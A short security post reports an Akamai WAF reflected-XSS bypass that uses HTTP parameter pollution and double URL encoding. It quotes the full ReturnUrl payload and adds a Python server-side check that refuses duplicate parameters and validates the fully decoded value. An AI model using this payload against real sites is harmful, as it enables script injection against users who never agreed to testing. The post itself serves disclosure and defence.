A reflected XSS bypass was discovered in Akamai WAF. The bypass combines HTTP parameter pollution with double URL encoding in the redirect parameter. The payload used for the bypass is: /login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529. This technique can potentially evade Akamai WAF protection.
For more insights, check out the original tweet here: https://twitter.com/0x0SojalSec/status/1850617358215418158.
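A server-side check for the redirect parameter that does not depend on the WAF, given here as an added example that is not from the original tweet or from Akamai: it refuses a repeated parameter and validates the value after decoding it to a fixed point. The function names, the five-round decode limit and the local-paths-only policy are assumptions.

```python
from urllib.parse import parse_qsl, unquote, urlsplit

MAX_ROUNDS = 5  # assumption: more encoding layers than this are refused

# The request line quoted in the post, kept as sample input.
PAGE_REQUEST = ("/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572"
                "%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564"
                "%256f%256d%2561%2569%256e%2529")


def fully_decode(value):
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def is_local_path(target):
    """Allow only same-site paths: no 'scheme:', '//host' or '/\\host'."""
    if any(ord(c) < 0x20 for c in target):
        return False
    return target.startswith("/") and not target.startswith(("//", "/\\"))


def safe_return_url(request_url, param="ReturnUrl"):
    """Return the redirect target if acceptable, else raise ValueError."""
    pairs = parse_qsl(urlsplit(request_url).query, keep_blank_values=True)
    # Compare names case-insensitively so 'returnurl' counts as a duplicate.
    values = [v for k, v in pairs if k.lower() == param.lower()]
    if len(values) != 1:
        raise ValueError(f"expected one {param}, got {len(values)}")
    # Validate the canonical form, so the filter and the application
    # cannot disagree about what the value means once decoded.
    if not is_local_path(fully_decode(values[0])):
        raise ValueError("redirect target is not a local path")
    return values[0]


if __name__ == "__main__":
    for url in (PAGE_REQUEST, "/login?ReturnUrl=%2Faccount"):
        try:
            print("allow", safe_return_url(url))
        except ValueError as err:
            print("block", err)
```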